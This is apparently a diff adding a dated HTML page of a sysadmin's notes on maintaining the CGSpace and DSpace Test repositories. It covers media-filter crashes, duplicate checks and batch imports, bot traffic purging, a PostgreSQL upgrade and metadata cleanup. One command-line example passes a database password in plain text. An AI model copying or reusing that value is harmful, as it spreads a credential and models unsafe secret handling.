+<li>Update the PostgreSQL JDBC driver to 42.3.2 in the Ansible Infrastructure playbooks and deploy on DSpace Test</li>
+<li>Mishell from CIP sent me a copy of a security scan their ICT had done on CGSpace using QualysGuard
+<ul>
+<li>The report was very long and generic, highlighting low-severity things like being able to post crap to search forms and have it appear on the results page</li>
+<li>Also they say we&rsquo;re using old jQuery and bootstrap, etc (fair enough) but there are no exploits per se</li>
+<li>At least now I know why all those Qualys IPs are scanning us all the time!!!</li>
+</ul>
+</li>
+<li>Mishell also said she&rsquo;s having issues logging into CGSpace
+<ul>
+<li>According to the logs her account is failing on LDAP authentication</li>
+<li>I checked CGSpace&rsquo;s LDAP credentials using ldapsearch and was able to connect so it&rsquo;s gotta be something with her account</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-02-03">2022-02-03</h2>
+<ul>
+<li>I synchronized DSpace Test with a fresh snapshot of CGSpace</li>
+<li>I noticed a bunch of thumbnails missing for items submitted in the last week on CGSpace so I ran the <code>dspace filter-media</code> script manually and eventually it crashed:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because &#39;ilri_establishiment.pdf.txt&#39; already exists
+</span></span><span style="display:flex;"><span>Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
+</span></span><span style="display:flex;"><span>SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because &#39;ilri_establishiment.pdf.jpg&#39; already exists
+</span></span><span style="display:flex;"><span>File: Agreement_on_the_Estab_of_ILRI.doc.txt
+</span></span><span style="display:flex;"><span>Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
+</span></span><span style="display:flex;"><span>java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
+</span></span><span style="display:flex;"><span>        at org.textmining.extraction.word.model.FormattedDiskPage.&lt;init&gt;(FormattedDiskPage.java:66)
+</span></span><span style="display:flex;"><span>        at org.textmining.extraction.word.model.CHPFormattedDiskPage.&lt;init&gt;(CHPFormattedDiskPage.java:62)
+</span></span><span style="display:flex;"><span>        at org.textmining.extraction.word.model.CHPBinTable.&lt;init&gt;(CHPBinTable.java:70)
+</span></span><span style="display:flex;"><span>        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
+</span></span><span style="display:flex;"><span>        at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
+</span></span><span style="display:flex;"><span>        at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
+</span></span><span style="display:flex;"><span>        at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>        at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</span></span></code></pre></div><ul>
+<li>I should look up that issue and report a bug somewhere perhaps, but for now I just forced the JPG thumbnails with:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -v &gt;&amp; /tmp/filter-media.log
+</span></span></code></pre></div><h2 id="2022-02-04">2022-02-04</h2>
+<ul>
+<li>I found a thread on the dspace-tech mailing list about the <code>media-filter</code> crash above
+<ul>
+<li>The problem is that the default filter for Word files is outdated, so we need to switch to the PoiWordFilter extractor</li>
+<li>After changing that I was able to filter the Word file on that item above:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -i 10568/67391 -p <span style="color:#e6db74">&#34;Word Text Extractor&#34;</span> -v
+</span></span><span style="display:flex;"><span>The following MediaFilters are enabled: 
+</span></span><span style="display:flex;"><span>Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
+</span></span><span style="display:flex;"><span>org.dspace.app.mediafilter.PoiWordFilter
+</span></span><span style="display:flex;"><span>File: Agreement_on_the_Estab_of_ILRI.doc.txt
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created &#39;Agreement_on_the_Estab_of_ILRI.doc.txt&#39;
+</span></span></code></pre></div><ul>
+<li>Meeting with the repositories working group to discuss issues moving forward in the One CGIAR</li>
+</ul>
+<h2 id="2022-02-07">2022-02-07</h2>
+<ul>
+<li>Gaia sent me her feedback on the duplicates for the TAC and ICW items for CGSpace a few days ago
+<ul>
+<li>I used the IDs marked &ldquo;delete&rdquo; in her spreadsheet to create a custom text facet with this GREL in OpenRefine:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>or(
+</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;1&#39;)),
+</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;4&#39;)),
+</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;5&#39;)),
+</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;6&#39;)),
+</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;8&#39;)),
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>sNotNull(value.match(&#39;178&#39;)),
+</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;186&#39;)),
+</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;188&#39;)),
+</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;189&#39;)),
+</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;197&#39;))
+</span></span><span style="display:flex;"><span>)
+</span></span></code></pre></div><ul>
+<li>Then I flagged all of these (seventy-five items)&hellip;
+<ul>
+<li>I decided to flag the deletes instead of star the keeps because there are some items in the original file that we not marked as duplicates so we have to keep those too</li>
+</ul>
+</li>
+<li>I generated the next batch of 200 items, from IDs 201 to 400, checked them for duplicates, and then added the PDF file names to the CSV for reference:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv &gt; /tmp/tac.csv
+</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -o /tmp/2022-02-07-tac-batch2-201-400.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv &gt; /tmp/batch2-filenames.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv &gt; /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
+</span></span></code></pre></div><ul>
+<li>Then I sent this second batch of items to Gaia to look at</li>
+</ul>
+<h2 id="2022-02-08">2022-02-08</h2>
+<ul>
+<li>Create a SAF archive for the first 200 items (IDs 1 to 200) that were <em>not</em> flagged as duplicates and upload them to a <a href="https://dspacetest.cgiar.org/handle/10568/117921">new collection on DSpace Test</a>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-08-tac-batch1-1to200.map
+</span></span></code></pre></div><ul>
+<li>Fix some occurrences of &ldquo;Hammond, Jim&rdquo; to be &ldquo;Hammond, James&rdquo; on CGSpace</li>
+<li>Start a full index on AReS</li>
+</ul>
+<h2 id="2022-02-09">2022-02-09</h2>
+<ul>
+<li>UptimeRobot said that CGSpace was down yesterday evening, but when I looked it was up and I didn&rsquo;t see a high database load or anything wrong</li>
+<li>Maria from Bioversity wrote to say that CGSpace was very slow also&hellip;</li>
+</ul>
+<h2 id="2022-02-10">2022-02-10</h2>
+<ul>
+<li>Looking at the Munin graphs on CGSpace I see several metrics showing that there was likely just increased load&hellip;</li>
+</ul>
+<p><img src="/cgspace-notes/2022/02/fw_packets-day-fs8.png" alt="Firewall packets day">
+<img src="/cgspace-notes/2022/02/jmx_dspace_sessions-day-fs8.png" alt="DSpace sessions day">
+<img src="/cgspace-notes/2022/02/jmx_tomcat_dbpools-day-fs8.png" alt="Tomcat pool day">
+<img src="/cgspace-notes/2022/02/postgres_connections_db-day-fs8.png" alt="PostgreSQL connections day"></p>
+<ul>
+<li>I extract the logs from nginx for yesterday so I can analyze the traffic:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep <span style="color:#e6db74">&#39;09/Feb/2022&#39;</span> &gt; /tmp/feb9-access.log
+</span></span><span style="display:flex;"><span># zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep <span style="color:#e6db74">&#39;09/Feb/2022&#39;</span> &gt; /tmp/feb9-rest.log
+</span></span><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /tmp/feb9-* | less | sort -u &gt; /tmp/feb9-ips.txt
+</span></span><span style="display:flex;"><span># wc -l /tmp/feb9-ips.txt
+</span></span><span style="display:flex;"><span>11636 /tmp/feb9-ips.tx
+</span></span></code></pre></div><ul>
+<li>I started resolving them with my <code>resolve-addresses-geoip2.py</code> script</li>
+<li>In the mean time I am looking at the requests and I see a new user agent: <code>1science Resolver 1.0.0</code>
+<ul>
+<li>Seems to be a defunct project from Elsevier (website down, Twitter account inactive since 2020)</li>
+</ul>
+</li>
+<li>I also see 3,400 requests from <code>EyeMonIT_bot_version_0.1_(http://www.eyemon.it/)</code>, but because it has &ldquo;bot&rdquo; in the name it gets heavily throttled&hellip;
+<ul>
+<li>I wonder who is monitoring CGSpace with that service&hellip;</li>
+</ul>
+</li>
+<li>Looking at the top twenty or so ASNs for the resolved IPs I see lots of bot traffic, but nothing malicious:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">20</span>
+</span></span><span style="display:flex;"><span>     79 24940
+</span></span><span style="display:flex;"><span>     89 36908
+</span></span><span style="display:flex;"><span>    100 9299
+</span></span><span style="display:flex;"><span>    107 2635
+</span></span><span style="display:flex;"><span>    110 44546
+</span></span><span style="display:flex;"><span>    111 16509
+</span></span><span style="display:flex;"><span>    118 7552
+</span></span><span style="display:flex;"><span>    120 4837
+</span></span><span style="display:flex;"><span>    123 50245
+</span></span><span style="display:flex;"><span>    123 55836
+</span></span><span style="display:flex;"><span>    147 45899
+</span></span><span style="display:flex;"><span>    173 33771
+</span></span><span style="display:flex;"><span>    192 39832
+</span></span><span style="display:flex;"><span>    202 32934
+</span></span><span style="display:flex;"><span>    235 29465
+</span></span><span style="display:flex;"><span>    260 15169
+</span></span><span style="display:flex;"><span>    466 14618
+</span></span><span style="display:flex;"><span>    607 24757
+</span></span><span style="display:flex;"><span>    768 714
+</span></span><span style="display:flex;"><span>   1214 8075
+</span></span></code></pre></div><ul>
+<li>The same information, but by org name:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">20</span>
+</span></span><span style="display:flex;"><span>     92 Orange
+</span></span><span style="display:flex;"><span>    100 Hetzner Online GmbH
+</span></span><span style="display:flex;"><span>    100 Philippine Long Distance Telephone Company
+</span></span><span style="display:flex;"><span>    107 AUTOMATTIC
+</span></span><span style="display:flex;"><span>    110 ALFA TELECOM s.r.o.
+</span></span><span style="display:flex;"><span>    111 AMAZON-02
+</span></span><span style="display:flex;"><span>    118 Viettel Group
+</span></span><span style="display:flex;"><span>    120 CHINA UNICOM China169 Backbone
+</span></span><span style="display:flex;"><span>    123 Reliance Jio Infocomm Limited
+</span></span><span style="display:flex;"><span>    123 Serverel Inc.
+</span></span><span style="display:flex;"><span>    147 VNPT Corp
+</span></span><span style="display:flex;"><span>    173 SAFARICOM-LIMITED
+</span></span><span style="display:flex;"><span>    192 Opera Software AS
+</span></span><span style="display:flex;"><span>    202 FACEBOOK
+</span></span><span style="display:flex;"><span>    235 MTN NIGERIA Communication limited
+</span></span><span style="display:flex;"><span>    260 GOOGLE
+</span></span><span style="display:flex;"><span>    466 AMAZON-AES
+</span></span><span style="display:flex;"><span>    607 Ethiopian Telecommunication Corporation
+</span></span><span style="display:flex;"><span>    768 APPLE-ENGINEERING
+</span></span><span style="display:flex;"><span>   1214 MICROSOFT-CORP-MSN-AS-BLOCK
+</span></span></code></pre></div><ul>
+<li>Most of these are pretty normal except &ldquo;Serverel&rdquo; and Hetzner perhaps, but their user agents are pretending to be normal users so who knows&hellip;</li>
+<li>I decided to look in the Solr stats with <code>facet.limit=1000&amp;facet.mincount=1</code> and found a few more definitely non-human agents:
+<ul>
+<li>scalaj-http/2.4.2</li>
+<li>scpitspi-rs</li>
+<li>lua-resty-http</li>
+<li>AHC/2.1</li>
+<li>acebookexternalhit &lt;&mdash;- typo, but purge it!!!</li>
+<li>Iframely/1.3.1 (+https://iframely.com/docs/about) Atlassian</li>
+<li>qbhttp/1.0.0</li>
+<li>got (<a href="https://github.com/sindresorhus/got">https://github.com/sindresorhus/got</a>)</li>
+<li>colly - <a href="https://github.com/gocolly/colly/v2">https://github.com/gocolly/colly/v2</a></li>
+<li>article-parser/4.2.10</li>
+<li>SomeRandomText</li>
+<li>adreview/1.0</li>
+</ul>
+</li>
+<li>I added them to the ILRI override in the DSpace spider list and ran the <code>check-spider-hits.sh</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+</span></span><span style="display:flex;"><span>Purging 234 hits from randint in statistics
+</span></span><span style="display:flex;"><span>Purging 337 hits from Koha in statistics
+</span></span><span style="display:flex;"><span>Purging 1164 hits from scalaj-http in statistics
+</span></span><span style="display:flex;"><span>Purging 1528 hits from scpitspi-rs in statistics
+</span></span><span style="display:flex;"><span>Purging 3050 hits from lua-resty-http in statistics
+</span></span><span style="display:flex;"><span>Purging 1683 hits from AHC in statistics
+</span></span><span style="display:flex;"><span>Purging 1129 hits from acebookexternalhit in statistics
+</span></span><span style="display:flex;"><span>Purging 534 hits from Iframely in statistics
+</span></span><span style="display:flex;"><span>Purging 1022 hits from qbhttp in statistics
+</span></span><span style="display:flex;"><span>Purging 330 hits from ^got in statistics
+</span></span><span style="display:flex;"><span>Purging 156 hits from ^colly in statistics
+</span></span><span style="display:flex;"><span>Purging 38 hits from article-parser in statistics
+</span></span><span style="display:flex;"><span>Purging 1148 hits from SomeRandomText in statistics
+</span></span><span style="display:flex;"><span>Purging 3126 hits from adreview in statistics
+</span></span><span style="display:flex;"><span>Purging 217 hits from 1science in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 14696
+</span></span></code></pre></div><ul>
+<li>I don&rsquo;t have time right now to add any of these to the COUNTER-Robots list&hellip;</li>
+<li>Peter asked me to add a new item type on CGSpace: Opinion Piece</li>
+<li>Map an item on CGSpace for Maria since she couldn&rsquo;t find it in the item mapper</li>
+</ul>
+<h2 id="2022-02-11">2022-02-11</h2>
+<ul>
+<li>CGSpace is slow and the load has been over 400% for a few hours
+<ul>
+<li>The number of DSpace sessions seems normal, even lower than a few days ago</li>
+<li>The number of PostgreSQL connections is low, but I see there are lots of &ldquo;AccessShare&rdquo; locks (green on Munin, not blue like usual)</li>
+<li>I will run all system updates, copy the latest config changes, and restart the server</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-02-12">2022-02-12</h2>
+<ul>
+<li>Install PostgreSQL 12 on my local dev environment to starting DSpace 6.x workflows with it:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5432:5432 -d postgres:12-alpine
+</span></span><span style="display:flex;"><span>$ createuser -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres --pwprompt dspacetest
+</span></span><span style="display:flex;"><span>$ createdb -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspacetest
+</span></span><span style="display:flex;"><span>$ psql -h localhost -U postgres -c <span style="color:#e6db74">&#39;ALTER USER dspacetest SUPERUSER;&#39;</span>
+</span></span><span style="display:flex;"><span>$ pg_restore -h localhost -U postgres -d dspacetest -O --role<span style="color:#f92672">=</span>dspacetest -h localhost ~/Downloads/dspace-2022-02-12.backup
+</span></span><span style="display:flex;"><span>$ psql -h localhost -U postgres -c <span style="color:#e6db74">&#39;ALTER USER dspacetest NOSUPERUSER;&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Eventually I will updated DSpace Test, then CGSpace (time to start paying off some technical debt!)</li>
+<li>Start a full Discovery re-index on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real    292m49.263s
+</span></span><span style="display:flex;"><span>user    201m26.097s
+</span></span><span style="display:flex;"><span>sys     3m2.459s
+</span></span></code></pre></div><ul>
+<li>Start a full harvest on AReS</li>
+</ul>
+<h2 id="2022-02-14">2022-02-14</h2>
+<ul>
+<li>Last week Gaia sent me her notes on the second batch of TAC/ICW documents (items 201–400 in the spreadsheet)
+<ul>
+<li>I created a filter in LibreOffice and selected the IDs for items with the action &ldquo;delete&rdquo;, then I created a custom text facet in OpenRefine with this GREL:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>or(
+isNotNull(value.match(&#39;201&#39;)),
+isNotNull(value.match(&#39;203&#39;)),
+isNotNull(value.match(&#39;209&#39;)),
+isNotNull(value.match(&#39;209&#39;)),
+isNotNull(value.match(&#39;215&#39;)),
+isNotNull(value.match(&#39;220&#39;)),
+isNotNull(value.match(&#39;225&#39;)),
+isNotNull(value.match(&#39;226&#39;)),
+isNotNull(value.match(&#39;227&#39;)),
+...
+isNotNull(value.match(&#39;396&#39;))
+</code></pre><ul>
+<li>Then I flagged all matching records and exported a CSV to use with SAFBuilder
+<ul>
+<li>Then I imported the SAF bundle on DSpace Test:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-14-tac-batch2-201to400.map
+</span></span></code></pre></div><ul>
+<li>Export the next batch from OpenRefine (items with ID 401 to 700), check duplicates, and then join with the file names:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv &gt; /tmp/tac3.csv
+</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-02-14-tac-batch3-401-700.csv
+</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv &gt; /tmp/tac3-filenames.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv &gt; /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
+</span></span></code></pre></div><ul>
+<li>I sent these 300 items to Gaia&hellip;</li>
+</ul>
+<h2 id="2022-02-16">2022-02-16</h2>
+<ul>
+<li>Upgrade PostgreSQL on DSpace Test from version 10 to 12
+<ul>
+<li>First, I installed the new version of PostgreSQL via the Ansible playbook scripts</li>
+<li>Then I stopped Tomcat and all PostgreSQL clusters and used <code>pg_upgrade</code> to upgrade the old version:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># systemctl stop tomcat7
+</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">10</span> main stop
+</span></span><span style="display:flex;"><span># tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
+</span></span><span style="display:flex;"><span># tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
+</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">12</span> main stop
+</span></span><span style="display:flex;"><span># pg_dropcluster <span style="color:#ae81ff">12</span> main
+</span></span><span style="display:flex;"><span># pg_upgradecluster <span style="color:#ae81ff">10</span> main
+</span></span><span style="display:flex;"><span># pg_ctlcluster <span style="color:#ae81ff">12</span> main start
+</span></span></code></pre></div><ul>
+<li>After that I <a href="https://adamj.eu/tech/2021/04/13/reindexing-all-tables-after-upgrading-to-postgresql-13/">re-indexed the database indexes using a query</a>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ su - postgres
+</span></span><span style="display:flex;"><span>$ cat /tmp/generate-reindex.sql
+</span></span><span style="display:flex;"><span>SELECT &#39;REINDEX TABLE CONCURRENTLY &#39; || quote_ident(relname) || &#39; /*&#39; || pg_size_pretty(pg_total_relation_size(C.oid)) || &#39;*/;&#39;
+</span></span><span style="display:flex;"><span>FROM pg_class C
+</span></span><span style="display:flex;"><span>LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
+</span></span><span style="display:flex;"><span>WHERE nspname = &#39;public&#39;
+</span></span><span style="display:flex;"><span>  AND C.relkind = &#39;r&#39;
+</span></span><span style="display:flex;"><span>  AND nspname !~ &#39;^pg_toast&#39;
+</span></span><span style="display:flex;"><span>ORDER BY pg_total_relation_size(C.oid) ASC;
+</span></span><span style="display:flex;"><span>$ psql dspace &lt; /tmp/generate-reindex.sql &gt; /tmp/reindex.sql
+</span></span><span style="display:flex;"><span>$ &lt;trim the extra stuff from /tmp/reindex.sql&gt;
+</span></span><span style="display:flex;"><span>$ psql dspace &lt; /tmp/reindex.sql
+</span></span></code></pre></div><ul>
+<li>I saw that the index on <code>metadatavalue</code> shrunk by about 200MB!</li>
+<li>After testing a few things I dropped the old cluster:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># pg_dropcluster <span style="color:#ae81ff">10</span> main
+</span></span><span style="display:flex;"><span># dpkg -l | grep postgresql-10 | awk <span style="color:#e6db74">&#39;{print $2}&#39;</span> | xargs dpkg -r
+</span></span></code></pre></div><h2 id="2022-02-17">2022-02-17</h2>
+<ul>
+<li>I updated my <code>migrate-fields.sh</code> script to use field names instead of IDs
+<ul>
+<li>The script now looks up the appropriate <code>metadata_field_id</code> values for each field in the metadata registry</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-02-18">2022-02-18</h2>
+<ul>
+<li>Normalize the <code>text_lang</code> attributes of metadata on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+</span></span><span style="display:flex;"><span> text_lang |  count  
+</span></span><span style="display:flex;"><span>-----------+---------
+</span></span><span style="display:flex;"><span> en_US     | 2838588
+</span></span><span style="display:flex;"><span> en        |    1082
+</span></span><span style="display:flex;"><span>           |     801
+</span></span><span style="display:flex;"><span> fr        |       2
+</span></span><span style="display:flex;"><span> vn        |       2
+</span></span><span style="display:flex;"><span> en_US.    |       1
+</span></span><span style="display:flex;"><span> sp        |       1
+</span></span><span style="display:flex;"><span>           |       0
+</span></span><span style="display:flex;"><span>(8 rows)
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;en_US.&#39;, &#39;&#39;);
+</span></span><span style="display:flex;"><span>UPDATE 1884
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;vi&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;vn&#39;);
+</span></span><span style="display:flex;"><span>UPDATE 2
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;es&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;sp&#39;);
+</span></span><span style="display:flex;"><span>UPDATE 1
+</span></span></code></pre></div><ul>
+<li>I then exported the entire repository and did some cleanup on DOIs
+<ul>
